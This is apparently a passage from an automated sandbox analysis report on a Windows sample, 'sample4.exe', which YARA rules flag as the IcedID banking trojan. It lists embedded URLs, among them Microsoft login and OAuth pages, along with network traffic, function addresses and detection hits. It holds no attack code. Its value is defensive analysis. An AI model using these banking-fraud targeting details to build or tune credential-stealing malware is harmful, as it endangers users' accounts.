          Source: sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmpString found in binary or memory: https://help.twitter.com/en/a-safer-twitter
          Source: sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp, sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpString found in binary or memory: https://help.twitter.com/en/contact-us
          Source: sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp, sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpString found in binary or memory: https://help.twitter.com/en/glossary
          Source: sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmpString found in binary or memory: https://help.twitter.com/en/how-you-can-control-your-privacy
          Source: sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp, sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpString found in binary or memory: https://help.twitter.com/en/managing-your-account
          Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpString found in binary or memory: https://help.twitter.com/en/managing-your-account#account-settings
          Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpString found in binary or memory: https://help.twitter.com/en/managing-your-account#deactivate-and-reactivate-accounts
          Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpString found in binary or memory: https://help.twitter.com/en/managing-your-account#login-and-password
          Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpString found in binary or memory: https://help.twitter.com/en/managing-your-account#notifications
          Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpString found in binary or memory: https://help.twitter.com/en/managing-your-account#suspended-accounts
          Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpString found in binary or memory: https://help.twitter.com/en/managing-your-account#username-email-and-phone
          Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpString found in binary or memory: https://help.twitter.com/en/managing-your-account#verified-accounts
          Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpString found in binary or memory: https://help.twitter.com/en/managing-your-account/forgotten-or-lost-password-reset
          Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpString found in binary or memory: https://help.twitter.com/en/managing-your-account/how-to-add-a-phone-number-to-your-account
          Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpString found in binary or memory: https://help.twitter.com/en/managing-your-account/notifications-on-mobile-devices
          Source: sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmpString found in binary or memory: https://help.twitter.com/en/new-user-faq
          Source: sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmpString found in binary or memory: https://help.twitter.com/en/rules
          Source: sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp, sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpString found in binary or memory: https://help.twitter.com/en/rules-and-policies
          Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpString found in binary or memory: https://help.twitter.com/en/rules-and-policies#general-policies
          Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpString found in binary or memory: https://help.twitter.com/en/rules-and-policies#law-enforcement-guildelines
          Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpString found in binary or memory: https://help.twitter.com/en/rules-and-policies#research-and-experiments
          Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpString found in binary or memory: https://help.twitter.com/en/rules-and-policies#twitter-rules
          Source: sample4.exe, 00000000.00000003.532297635.000000000153E000.00000004.00000001.sdmpString found in binary or memory: https://help.twitter.com/en/rules-and-policies/twitter-cookies
          Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpString found in binary or memory: https://help.twitter.com/en/rules-and-policies/twitter-rules
          Source: sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp, sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpString found in binary or memory: https://help.twitter.com/en/safety-and-security
          Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpString found in binary or memory: https://help.twitter.com/en/safety-and-security#abuse
          Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpString found in binary or memory: https://help.twitter.com/en/safety-and-security#ads-and-data-privacy
          Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpString found in binary or memory: https://help.twitter.com/en/safety-and-security#hacked-account
          Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpString found in binary or memory: https://help.twitter.com/en/safety-and-security#sensitive-content
          Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpString found in binary or memory: https://help.twitter.com/en/safety-and-security#spam-and-fake-accounts
          Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpString found in binary or memory: https://help.twitter.com/en/safety-and-security/account-security-tips
          Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpString found in binary or memory: https://help.twitter.com/en/safety-and-security/control-your-twitter-experience
          Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpString found in binary or memory: https://help.twitter.com/en/safety-and-security/how-to-make-twitter-private-and-public
          Source: sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp, sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpString found in binary or memory: https://help.twitter.com/en/twitter-guide
          Source: sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp, sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpString found in binary or memory: https://help.twitter.com/en/using-twitter
          Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpString found in binary or memory: https://help.twitter.com/en/using-twitter#adding-content-to-your-tweet
          Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpString found in binary or memory: https://help.twitter.com/en/using-twitter#blocking-and-muting
          Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpString found in binary or memory: https://help.twitter.com/en/using-twitter#direct-messages
          Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpString found in binary or memory: https://help.twitter.com/en/using-twitter#fleets
          Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpString found in binary or memory: https://help.twitter.com/en/using-twitter#following-people-and-groups
          Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpString found in binary or memory: https://help.twitter.com/en/using-twitter#search-and-trends
          Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpString found in binary or memory: https://help.twitter.com/en/using-twitter#tweets
          Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpString found in binary or memory: https://help.twitter.com/en/using-twitter#twitter-on-your-device
          Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpString found in binary or memory: https://help.twitter.com/en/using-twitter#twitter-voices
          Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpString found in binary or memory: https://help.twitter.com/en/using-twitter#using-periscope
          Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpString found in binary or memory: https://help.twitter.com/en/using-twitter#website-and-app-integrations
          Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpString found in binary or memory: https://help.twitter.com/en/using-twitter/advanced-twitter-mute-options
          Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpString found in binary or memory: https://help.twitter.com/en/using-twitter/direct-messages
          Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpString found in binary or memory: https://help.twitter.com/en/using-twitter/mentions-and-replies
          Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpString found in binary or memory: https://help.twitter.com/en/using-twitter/tweeting-gifs-and-pictures
          Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpString found in binary or memory: https://help.twitter.com/en/using-twitter/twitter-videos
          Source: sample4.exe, 00000000.00000003.532297635.000000000153E000.00000004.00000001.sdmp, sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpString found in binary or memory: https://help.twitter.com/es
          Source: sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmpString found in binary or memory: https://help.twitter.com/fa
          Source: sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmpString found in binary or memory: https://help.twitter.com/fi
          Source: sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmpString found in binary or memory: https://help.twitter.com/fil
          Source: sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp, sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpString found in binary or memory: https://help.twitter.com/fr
          Source: sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmpString found in binary or memory: https://help.twitter.com/gu
          Source: sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmpString found in binary or memory: https://help.twitter.com/he
          Source: sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp, sample4.exe, 00000000.00000003.532297635.000000000153E000.00000004.00000001.sdmpString found in binary or memory: https://help.twitter.com/hi
          Source: sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp, sample4.exe, 00000000.00000003.532297635.000000000153E000.00000004.00000001.sdmp, sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpString found in binary or memory: https://help.twitter.com/hr
          Source: sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmpString found in binary or memory: https://help.twitter.com/hu
          Source: sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp, sample4.exe, 00000000.00000003.532297635.000000000153E000.00000004.00000001.sdmpString found in binary or memory: https://help.twitter.com/id
          Source: sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp, sample4.exe, 00000000.00000003.532297635.000000000153E000.00000004.00000001.sdmpString found in binary or memory: https://help.twitter.com/it
          Source: sample4.exe, 00000000.00000003.532297635.000000000153E000.00000004.00000001.sdmp, sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpString found in binary or memory: https://help.twitter.com/ja
          Source: sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmpString found in binary or memory: https://help.twitter.com/kn
          Source: sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp, sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpString found in binary or memory: https://help.twitter.com/ko
          Source: sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmpString found in binary or memory: https://help.twitter.com/mr
          Source: sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmpString found in binary or memory: https://help.twitter.com/ms
          Source: sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp, sample4.exe, 00000000.00000003.532297635.000000000153E000.00000004.00000001.sdmpString found in binary or memory: https://help.twitter.com/nl
          Source: sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmpString found in binary or memory: https://help.twitter.com/no
          Source: sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmpString found in binary or memory: https://help.twitter.com/pl
          Source: sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp, sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpString found in binary or memory: https://help.twitter.com/pt
          Source: sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmpString found in binary or memory: https://help.twitter.com/ro
          Source: sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp, sample4.exe, 00000000.00000003.532297635.000000000153E000.00000004.00000001.sdmpString found in binary or memory: https://help.twitter.com/ru
          Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpString found in binary or memory: https://help.twitter.com/rules-and-policies/twitter-cookies
          Source: sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp, sample4.exe, 00000000.00000003.532297635.000000000153E000.00000004.00000001.sdmpString found in binary or memory: https://help.twitter.com/sk
          Source: sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp, sample4.exe, 00000000.00000003.532297635.000000000153E000.00000004.00000001.sdmpString found in binary or memory: https://help.twitter.com/sr
          Source: sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmpString found in binary or memory: https://help.twitter.com/sv
          Source: sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmpString found in binary or memory: https://help.twitter.com/ta
          Source: sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmpString found in binary or memory: https://help.twitter.com/th
          Source: sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp, sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpString found in binary or memory: https://help.twitter.com/tr
          Source: sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmpString found in binary or memory: https://help.twitter.com/uk
          Source: sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmpString found in binary or memory: https://help.twitter.com/vi
          Source: sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmpString found in binary or memory: https://help.twitter.com/zh-cn
          Source: sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmpString found in binary or memory: https://help.twitter.com/zh-tw
          Source: sample4.exe, 00000000.00000003.519277199.000000000152B000.00000004.00000001.sdmpString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE1Mu3b?ver=5c31
          Source: sample4.exe, 00000000.00000003.519277199.000000000152B000.00000004.00000001.sdmpString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4sOli
          Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpString found in binary or memory: https://investor.twitterinc.com/
          Source: sample4.exe, 00000000.00000003.545079805.0000000003C0D000.00000004.00000001.sdmpString found in binary or memory: https://km.support.apple.com/etc/designs/support/publish/commons.min.js
          Source: sample4.exe, 00000000.00000002.577897876.0000000003C04000.00000004.00000001.sdmpString found in binary or memory: https://locate.apple.com/
          Source: sample4.exe, 00000000.00000003.519277199.000000000152B000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0
          Source: sample4.exe, 00000000.00000003.519277199.000000000152B000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/logout.srf?ct=1610593513
          Source: sample4.exe, 00000000.00000003.519277199.000000000152B000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/me.srf?wa=wsignin1.0
          Source: sample4.exe, 00000000.00000003.519277199.000000000152B000.00000004.00000001.sdmpString found in binary or memory: https://login.microsoftonline.com/common/oauth2/authorize?response_mode=form_post
          Source: sample4.exe, 00000000.00000003.530694107.0000000001521000.00000004.00000001.sdmpString found in binary or memory: https://login.microsoftonline.com/common/oauth2/authorize?response_mode=form_post&amp;response_type=
          Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpString found in binary or memory: https://marketing.twitter.com/
          Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpString found in binary or memory: https://marketing.twitter.com/en/insights
          Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpString found in binary or memory: https://marketing.twitter.com/en/success-stories
          Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpString found in binary or memory: https://media.twitter.com/
          Source: sample4.exe, 00000000.00000003.519277199.000000000152B000.00000004.00000001.sdmpString found in binary or memory: https://office.com/start
          Source: sample4.exe, 00000000.00000003.519277199.000000000152B000.00000004.00000001.sdmpString found in binary or memory: https://onedrive.live.com/about/en-us/
          Source: sample4.exe, 00000000.00000003.519277199.000000000152B000.00000004.00000001.sdmpString found in binary or memory: https://osiprodweuodcspstoa01.blob.core.windows.net
          Source: sample4.exe, 00000000.00000003.519277199.000000000152B000.00000004.00000001.sdmpString found in binary or memory: https://outlook.live.com/owa/
          Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpString found in binary or memory: https://pbs.twimg.com/tweet_video_thumb/EAa_YvRU4AAH-IN.jpg:large
          Source: sample4.exe, 00000000.00000003.532297635.000000000153E000.00000004.00000001.sdmpString found in binary or memory: https://platform.twitter.com/widgets.js
          Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpString found in binary or memory: https://privacy.twitter.com/
          Source: sample4.exe, 00000000.00000003.519277199.000000000152B000.00000004.00000001.sdmpString found in binary or memory: https://products.office.com/en-us/academic/compare-office-365-education-plans
          Source: sample4.exe, 00000000.00000003.533332045.0000000001539000.00000004.00000001.sdmpString found in binary or memory: https://resources.digital-cloud-prem.medallia.com
          Source: sample4.exe, 00000000.00000003.533332045.0000000001539000.00000004.00000001.sdmpString found in binary or memory: https://s1259914507.t.eloqua.com
          Source: sample4.exe, 00000000.00000003.545079805.0000000003C0D000.00000004.00000001.sdmpString found in binary or memory: https://schema.org
          Source: sample4.exe, 00000000.00000003.533332045.0000000001539000.00000004.00000001.sdmpString found in binary or memory: https://static.ads-twitter.com
          Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpString found in binary or memory: https://status.twitterstat.us/
          Source: sample4.exe, 00000000.00000003.545079805.0000000003C0D000.00000004.00000001.sdmpString found in binary or memory: https://support.apple.com/
          Source: sample4.exe, 00000000.00000003.545079805.0000000003C0D000.00000004.00000001.sdmpString found in binary or memory: https://support.apple.com/#organization
          Source: sample4.exe, 00000000.00000002.571424738.0000000001539000.00000004.00000020.sdmpString found in binary or memory: https://support.apple.com/ar-jo
          Source: sample4.exe, 00000000.00000002.571424738.0000000001539000.00000004.00000020.sdmpString found in binary or memory: https://support.apple.com/de-de
          Source: sample4.exe, 00000000.00000002.571424738.0000000001539000.00000004.00000020.sdmpString found in binary or memory: https://support.apple.com/en-ae
          Source: sample4.exe, 00000000.00000002.571424738.0000000001539000.00000004.00000020.sdmpString found in binary or memory: https://support.apple.com/en-eg
          Source: sample4.exe, 00000000.00000002.571424738.0000000001539000.00000004.00000020.sdmpString found in binary or memory: https://support.apple.com/en-me
          Source: sample4.exe, 00000000.00000002.571424738.0000000001539000.00000004.00000020.sdmpString found in binary or memory: https://support.apple.com/fr-ci
          Source: sample4.exe, 00000000.00000002.571424738.0000000001539000.00000004.00000020.sdmpString found in binary or memory: https://support.apple.com/fr-gq
          Source: sample4.exe, 00000000.00000002.571424738.0000000001539000.00000004.00000020.sdmpString found in binary or memory: https://support.apple.com/pt-pt
          Source: sample4.exe, 00000000.00000002.571424738.0000000001539000.00000004.00000020.sdmpString found in binary or memory: https://support.apple.com/ro-ro
          Source: sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmpString found in binary or memory: https://support.twitter.com/forms/get_help_now
          Source: sample4.exe, 00000000.00000003.519277199.000000000152B000.00000004.00000001.sdmpString found in binary or memory: https://support.xbox.com
          Source: sample4.exe, 00000000.00000003.519277199.000000000152B000.00000004.00000001.sdmpString found in binary or memory: https://support.xbox.com/
          Source: sample4.exe, 00000000.00000003.533332045.0000000001539000.00000004.00000001.sdmpString found in binary or memory: https://syndication.twitter.com
          Source: sample4.exe, 00000000.00000003.519277199.000000000152B000.00000004.00000001.sdmpString found in binary or memory: https://templates.office.com/
          Source: sample4.exe, 00000000.00000003.519277199.000000000152B000.00000004.00000001.sdmpString found in binary or memory: https://templates.office.com/collection-family-activities
          Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpString found in binary or memory: https://transparency.twitter.com/
          Source: sample4.exe, 00000000.00000003.533332045.0000000001539000.00000004.00000001.sdmp, sample4.exe, 00000000.00000003.532297635.000000000153E000.00000004.00000001.sdmpString found in binary or memory: https://twitter.com
          Source: sample4.exe, 00000000.00000003.533332045.0000000001539000.00000004.00000001.sdmp, sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpString found in binary or memory: https://twitter.com/
          Source: sample4.exe, 00000000.00000003.545079805.0000000003C0D000.00000004.00000001.sdmpString found in binary or memory: https://twitter.com/AppleSupport
          Source: sample4.exe, 00000000.00000003.545079805.0000000003C0D000.00000004.00000001.sdmpString found in binary or memory: https://twitter.com/applesupport
          Source: sample4.exe, 00000000.00000003.533332045.0000000001539000.00000004.00000001.sdmpString found in binary or memory: https://twitter.com/i/csp_report;
          Source: sample4.exe, 00000000.00000003.533332045.0000000001539000.00000004.00000001.sdmpString found in binary or memory: https://twitter.com/i/jot
          Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpString found in binary or memory: https://twitter.com/intent/follow?user_id=17874544&screen_name=TwitterSupport
          Source: sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmpString found in binary or memory: https://twitter.com/login?redirect_after_login=https://help.twitter.com/en
          Source: sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmpString found in binary or memory: https://twitter.com/logout
          Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpString found in binary or memory: https://twitter.com/privacy
          Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpString found in binary or memory: https://twitter.com/signup
          Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpString found in binary or memory: https://twitter.com/tos
          Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpString found in binary or memory: https://twittercommunity.com/
          Source: sample4.exe, 00000000.00000003.533332045.0000000001539000.00000004.00000001.sdmpString found in binary or memory: https://udc-neb.kampyle.com/
          Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpString found in binary or memory: https://video.twimg.com/tweet_video/EAa_YvRU4AAH-IN.mp4
          Source: sample4.exe, 00000000.00000003.545079805.0000000003C0D000.00000004.00000001.sdmp, sample4.exe, 00000000.00000003.545246856.0000000003C01000.00000004.00000001.sdmpString found in binary or memory: https://www.apple.com
          Source: sample4.exe, 00000000.00000003.545079805.0000000003C0D000.00000004.00000001.sdmpString found in binary or memory: https://www.apple.com/
          Source: sample4.exe, 00000000.00000003.545079805.0000000003C0D000.00000004.00000001.sdmpString found in binary or memory: https://www.apple.com/#organization
          Source: sample4.exe, 00000000.00000002.571424738.0000000001539000.00000004.00000020.sdmpString found in binary or memory: https://www.apple.com/certificateauthority/public/.0
          Source: sample4.exe, 00000000.00000002.571424738.0000000001539000.00000004.00000020.sdmpString found in binary or memory: https://www.apple.com/certificateauthority/public/0
          Source: sample4.exe, 00000000.00000003.545246856.0000000003C01000.00000004.00000001.sdmpString found in binary or memory: https://www.apple.com/ipad/
          Source: sample4.exe, 00000000.00000003.545246856.0000000003C01000.00000004.00000001.sdmpString found in binary or memory: https://www.apple.com/iphone/
          Source: sample4.exe, 00000000.00000003.545079805.0000000003C0D000.00000004.00000001.sdmpString found in binary or memory: https://www.apple.com/legal/internet-services/terms/site.html
          Source: sample4.exe, 00000000.00000003.545079805.0000000003C0D000.00000004.00000001.sdmpString found in binary or memory: https://www.apple.com/legal/privacy/en-ww/
          Source: sample4.exe, 00000000.00000003.545079805.0000000003C0D000.00000004.00000001.sdmpString found in binary or memory: https://www.apple.com/legal/sla/
          Source: sample4.exe, 00000000.00000003.545079805.0000000003C0D000.00000004.00000001.sdmpString found in binary or memory: https://www.apple.com/legal/warranty/
          Source: sample4.exe, 00000000.00000003.545246856.0000000003C01000.00000004.00000001.sdmpString found in binary or memory: https://www.apple.com/mac/
          Source: sample4.exe, 00000000.00000002.577897876.0000000003C04000.00000004.00000001.sdmpString found in binary or memory: https://www.apple.com/retail/
          Source: sample4.exe, 00000000.00000003.545079805.0000000003C0D000.00000004.00000001.sdmpString found in binary or memory: https://www.apple.com/shop/goto/help/sales_refunds
          Source: sample4.exe, 00000000.00000003.545079805.0000000003C0D000.00000004.00000001.sdmpString found in binary or memory: https://www.apple.com/sitemap/
          Source: sample4.exe, 00000000.00000003.545246856.0000000003C01000.00000004.00000001.sdmpString found in binary or memory: https://www.apple.com/watch/
          Source: sample4.exe, 00000000.00000003.533332045.0000000001539000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPS0
          Source: sample4.exe, 00000000.00000002.571424738.0000000001539000.00000004.00000020.sdmpString found in binary or memory: https://www.digicert.com/rpa-ua0
          Source: sample4.exe, 00000000.00000003.533332045.0000000001539000.00000004.00000001.sdmpString found in binary or memory: https://www.google-analytics.com
          Source: sample4.exe, 00000000.00000003.519277199.000000000152B000.00000004.00000001.sdmpString found in binary or memory: https://www.microsoftstore.com/store/msusa/en_US/DisplayAddEditPaymentPage/
          Source: sample4.exe, 00000000.00000003.519277199.000000000152B000.00000004.00000001.sdmpString found in binary or memory: https://www.microsoftstore.com/store/msusa/en_US/DisplayEditProfilePage/tab.profile
          Source: sample4.exe, 00000000.00000003.519277199.000000000152B000.00000004.00000001.sdmpString found in binary or memory: https://www.microsoftstore.com/store/msusa/en_US/DisplayFindYourOrderPage/nextAction.DisplayAccountO
          Source: sample4.exe, 00000000.00000003.519277199.000000000152B000.00000004.00000001.sdmpString found in binary or memory: https://www.microsoftstore.com/store/msusa/en_US/DisplayFindYourOrderPage/nextAction.DisplayAccountR
          Source: sample4.exe, 00000000.00000003.519277199.000000000152B000.00000004.00000001.sdmpString found in binary or memory: https://www.microsoftstore.com/store/msusa/en_US/DisplayFindYourOrderPage/nextAction.DisplayDownload
          Source: sample4.exe, 00000000.00000003.519277199.000000000152B000.00000004.00000001.sdmpString found in binary or memory: https://www.microsoftstore.com/store/msusa/en_US/wishlists?Wt.mc_id=wishlist_landingpage
          Source: sample4.exe, 00000000.00000003.519277199.000000000152B000.00000004.00000001.sdmpString found in binary or memory: https://www.onenote.com/
          Source: sample4.exe, 00000000.00000003.519277199.000000000152B000.00000004.00000001.sdmpString found in binary or memory: https://www.skype.com/en/
          Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpString found in binary or memory: https://www.twitterflightschool.com/sl/382652bc
          Source: sample4.exe, 00000000.00000003.545079805.0000000003C0D000.00000004.00000001.sdmpString found in binary or memory: https://www.wikidata.org/wiki/Q65129345
          Source: sample4.exe, 00000000.00000003.519277199.000000000152B000.00000004.00000001.sdmpString found in binary or memory: https://www.xbox.com/
          Source: sample4.exe, 00000000.00000003.545079805.0000000003C0D000.00000004.00000001.sdmpString found in binary or memory: https://www.youtube.com/applesupport
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
          Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
          Source: unknownHTTPS traffic detected: 104.244.42.131:443 -> 192.168.2.3:49761 version: TLS 1.2
          Source: C:\Users\user\Desktop\sample4.exeCode function: 0_2_0012D175 GetPropW,GlobalFix,SendMessageW,GlobalUnWire,RemovePropW,GlobalFree,GlobalUnWire,GetAsyncKeyState,SendMessageW,0_2_0012D175

          E-Banking Fraud:

          barindex
          Yara detected IcedIDShow sources
          Source: Yara matchFile source: Process Memory Space: sample4.exe PID: 2100, type: MEMORY
          Yara detected IcedIDShow sources
          Source: Yara matchFile source: 00000000.00000003.362692606.0000000001320000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.551228989.00000000000D1000.00000020.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.sample4.exe.d0000.0.unpack, type: UNPACKEDPE
          Source: C:\Users\user\Desktop\sample4.exeProcess Stats: CPU usage > 98%
          Source: C:\Users\user\Desktop\sample4.exeCode function: 0_2_0026404F0_2_0026404F
          Source: C:\Users\user\Desktop\sample4.exeCode function: 0_2_0026416F0_2_0026416F
          Source: C:\Users\user\Desktop\sample4.exeCode function: 0_2_0024C56C0_2_0024C56C
          Source: C:\Users\user\Desktop\sample4.exeCode function: 0_2_0017A7C00_2_0017A7C0
          Source: C:\Users\user\Desktop\sample4.exeCode function: 0_2_002648470_2_00264847
          Source: C:\Users\user\Desktop\sample4.exeCode function: 0_2_0025098E0_2_0025098E
          Source: C:\Users\user\Desktop\sample4.exeCode function: 0_2_00152C340_2_00152C34
          Source: C:\Users\user\Desktop\sample4.exeCode function: 0_2_00256C800_2_00256C80
          Source: C:\Users\user\Desktop\sample4.exeCode function: 0_2_002908900_2_00290890
          Source: C:\Users\user\Desktop\sample4.exeCode function: 0_2_002906830_2_00290683
          Source: C:\Users\user\Desktop\sample4.exeCode function: String function: 0024972F appears 62 times
          Source: C:\Users\user\Desktop\sample4.exeCode function: String function: 00249810 appears 35 times
          Source: unknownProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2100 -s 768
          Source: sample4.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
